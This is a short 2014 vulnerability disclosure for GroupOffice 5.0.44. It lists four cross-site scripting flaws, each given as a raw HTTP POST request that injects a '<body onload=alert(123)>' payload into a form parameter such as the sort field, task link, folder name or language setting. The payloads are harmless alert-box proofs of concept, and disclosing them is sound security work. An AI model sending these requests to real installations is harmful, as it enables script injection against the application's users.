# ==============================================================
# Title ...| GroupOffice Multiple XSS
# Version .| groupoffice-com-5.0.44.tar.gz 
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| https://www.group-office.com/
# ==============================================================

 
# ==============================================================
# 1. XSS


---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=tasks/portlet/portletGrid&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

sort='><body onload=alert(123)>&dir=ASC&groupBy=tasklist_name&groupDir=ASC&security_token=PRWJsDvCpVw4kElX2zBN
---<request>---



# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=tasks/task/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

task=task&tmp_files=&id=0&security_token=PRWJsDvCpVw4kElX2zBN&name=asdasd&link=<body onload=alert(123)>&start_time=27-02-2014&due_time=27-02-2014&status=NEEDS-ACTION&percentage_complete=0&tasklist_id=3&category_id=&priority=1&description=&interval=1&freq=&col_9=
---<request>---



# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=files/folder/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

parent_id=36&security_token=PRWJsDvCpVw4kElX2zBN&name=<body onload=alert(123)>
---<request>---




# ==============================================================
# 4. XSS

---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=settings/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

tmp_files=&id=3&security_token=PRWJsDvCpVw4kElX2zBN&language=<body onload=alert(123)>&timezone=Asia%2FJakarta&dateformat=-%3AdmY&time_format=H%3Ai&first_weekday=1&holidayset=en&thousands_separator=%2C&decimal_separator=.&currency=%E2%82%AC&list_separator=%3B&text_separator=%22&theme=Group-Office&start_module=summary&max_rows_list=30&sort_name=last_name&mute_sound=0&mute_reminder_sound=0&mute_new_mail_sound=0&popup_reminders=0&mail_reminders=0&show_smilies=1&auto_punctuation=0&current_password=&password=&passwordConfirm=&first_name=Demo&middle_name=&last_name=User&title=&suffix=&initials=&sex=M&birthday=&department=&function=CEO&email=demo%40acmerpp.demo&email2=&email3=&home_phone=&fax=&cellular=06-12345678&work_phone=&work_fax=&address=1111%20Broadway&address_no=&zip=10019&city=New%20York&state=NY&country=US&use_html_markup=on&font_size=12px&comments_enable_read_more=0&reminder_value=&reminder_multiplier=60&background=EBF1E2&default_calendar_id=3&show_statuses=1&default_tasklist_id=3
---<request>---

 

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/